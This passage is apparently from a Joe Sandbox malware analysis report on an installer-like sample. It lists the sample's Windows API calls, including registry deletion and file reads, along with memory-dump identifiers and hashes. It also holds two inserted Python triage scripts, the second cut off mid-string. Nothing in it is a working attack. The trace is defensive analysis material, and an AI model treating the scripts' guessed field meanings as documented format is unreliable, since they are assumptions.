                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 334405425-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
                                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
                                                                        • RegCloseKey.KERNELBASE(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseOpenValue
                                                                        • String ID:
                                                                        • API String ID: 167947723-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                        • RegCloseKey.KERNELBASE(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
• Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
• Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
• Instruction Fuzzy Hash: B001F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
• RegCloseKey.ADVAPI32(00000000), ref: 004022FD
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: CloseDeleteOpenValue
• String ID:
• API String ID: 849931509-0
• Opcode ID: 7b30a92271470e741bedac9d47006af4ab5eeb306cb7f676dee8e085548db756
• Instruction ID: f65991dd8835b810368ef95f62892a142216c4200c100bb05ab411dbf566f3c1
• Opcode Fuzzy Hash: 7b30a92271470e741bedac9d47006af4ab5eeb306cb7f676dee8e085548db756
• Instruction Fuzzy Hash: D5F06272A04210ABEB15AFF59A4EBAE7278DB04318F20453BF201B71D1D5FC5D028A6D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405B5A
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
• Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
• Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
• Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
Uniqueness
• Uniqueness Score: -1.00%
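The function entries in this section are machine-generated: each "APIs" list records calls in the form `API.MODULE(arg,arg,...), ref: ADDRESS`, with a "Part of subcall function X:" prefix when the call belongs to a callee rather than to the function itself. When triaging many such entries it is quicker to parse them than to read them. The Python below is an added example by the editor, not part of the Joe Sandbox report or its tooling. It parses that line format, pulls out resolved literal arguments (such as the sample path in the GetFileAttributesW entry above), and labels ordered API sequences; the two sample entries are copied from the entries above as constructed input, and the sequence labels ("registry value deletion", "file open after attribute probe", "file attribute rewrite") are the editor's own names, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: the "APIs" lists of two function entries in this
# report, in Joe Sandbox's line format  "API.MODULE(arg,arg,...), ref: ADDRESS".
# A "Part of subcall function X:" prefix marks a call made inside callee X.
SAMPLE_REGISTRY_ENTRY = r"""
• Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
• RegCloseKey.ADVAPI32(00000000), ref: 004022FD
"""

SAMPLE_FILE_ENTRY = r"""
• GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405B5A
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
"""

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"                                              # optional bullet
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"  # optional subcall prefix
    r"(?P<api>\w+)\.(?P<module>\w+)"                              # e.g. RegOpenKeyExW.KERNELBASE
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

HEX32 = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # callee address when the call is attributed to a subcall


def parse_api_list(text: str) -> List[ApiCall]:
    """Parse the bullet lines of one entry's "APIs" section."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def literal_arguments(calls: List[ApiCall]) -> List[str]:
    """Arguments the sandbox resolved to something other than a DWORD or '?',
    e.g. embedded paths or strings worth pivoting on."""
    return [a for c in calls for a in c.args if a != "?" and not HEX32.fullmatch(a)]


# Editor-chosen labels for ordered API sequences (hypothetical, not Joe Sandbox signatures).
PATTERNS: List[Tuple[str, Tuple[str, ...]]] = [
    ("registry value deletion", ("RegOpenKeyExW", "RegDeleteValueW", "RegCloseKey")),
    ("file open after attribute probe", ("GetFileAttributesW", "CreateFileW")),
    ("file attribute rewrite", ("GetFileAttributesW", "SetFileAttributesW")),
]


def is_subsequence(pattern: Tuple[str, ...], names: List[str]) -> bool:
    """True if every pattern element appears in names, in order (gaps allowed)."""
    it = iter(names)
    return all(any(p == n for n in it) for p in pattern)


def classify(calls: List[ApiCall]) -> List[str]:
    """Labels whose API sequence occurs, in order, in this entry's call list."""
    names = [c.api for c in calls]
    return [label for label, seq in PATTERNS if is_subsequence(seq, names)]


if __name__ == "__main__":
    for entry in (SAMPLE_REGISTRY_ENTRY, SAMPLE_FILE_ENTRY):
        calls = parse_api_list(entry)
        print([f"{c.module}!{c.api}@{c.ref:08X}" for c in calls],
              classify(calls), literal_arguments(calls))
```

Because `ref` is the address of the call instruction and `subcall_of` the callee's address, a subcall line should be attributed to the callee when grouping by function; the same parser can be run over every entry of a report to pivot on `Opcode Fuzzy Hash` values across samples.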

APIs
• GetFileAttributesW.KERNELBASE(?,?,00405736,?,?,00000000,0040590C,?,?,?,?), ref: 00405B36
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B4A
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
• Instruction ID: 0892b5ef0b2723f07dcd522954823931705bd605f292322b3a664a2a0928558f
• Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
• Instruction Fuzzy Hash: CDD0C972908020AFC2103728AE0C89BBB65DB543717018B31F965A22B0C7305C528AA6
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
• Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
• Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
• Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
• Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
• Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
• Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
• Instruction ID: 08475c9ad2706a2906e61487a991445bf78722f829394d34d4d14abd34e5eaae
• Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
• Instruction Fuzzy Hash: 73C09B717443007BDA308B50ED49F1777546798B40F144439B714F50D4C674E451D61D
Uniqueness
• Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                        • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                        • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                        • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
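Every function entry above repeats the same thirteen memory-dump identifiers under "Memory Dump Source". The following Python script is an added example written for this page; it is not Joe Sandbox code. It parses those identifiers into a memory map of the analysed process image and resolves the `ref:` call-site addresses from the API lists to the region that contains them. The report itself only states that the dumps are PE-backed with offset 00400000; treating the fourth dotted field as the region base, the fifth as a Windows PAGE_* protection constant and the seventh as the MEM_IMAGE type flag is an assumption made here, as is taking each region's end to be the next region's base (the identifiers do not carry a size). The sample text is copied from the Memory Dump Source lines of this report, including the "Download File" link residue the parser tolerates.

```python
"""Reconstruct a process memory map from Joe Sandbox memory-dump identifiers.
Added example for this report, not Joe Sandbox code. Only "base address" and
"PE-backed" are stated by the report; the other field meanings are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# winnt.h protection constants. Assumption: the fifth dotted field holds one of these.
PAGE_PROTECT: Dict[int, str] = {
    0x01: "---",   # PAGE_NOACCESS
    0x02: "R--",   # PAGE_READONLY
    0x04: "RW-",   # PAGE_READWRITE
    0x08: "RWc",   # PAGE_WRITECOPY
    0x10: "--X",   # PAGE_EXECUTE
    0x20: "R-X",   # PAGE_EXECUTE_READ
    0x40: "RWX",   # PAGE_EXECUTE_READWRITE
    0x80: "RWXc",  # PAGE_EXECUTE_WRITECOPY
}
EXECUTE_MASK = 0xF0        # every PAGE_EXECUTE* value has one of these bits set
MEM_IMAGE = 0x01000000     # winnt.h; assumption: the seventh field is the MEM_* type

# <proc>.<stage>.<dump id>.<base>.<protect>.<flags>.<type>.<module>.sdmp
DUMP_RE = re.compile(
    r"[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.(?P<dumpid>\d+)\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.(?P<memtype>[0-9A-Fa-f]{8})\."
    r"[0-9A-Fa-f]{8}\.sdmp"
)

# Constructed sample: the Memory Dump Source block copied from the report above.
SAMPLE = """\
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
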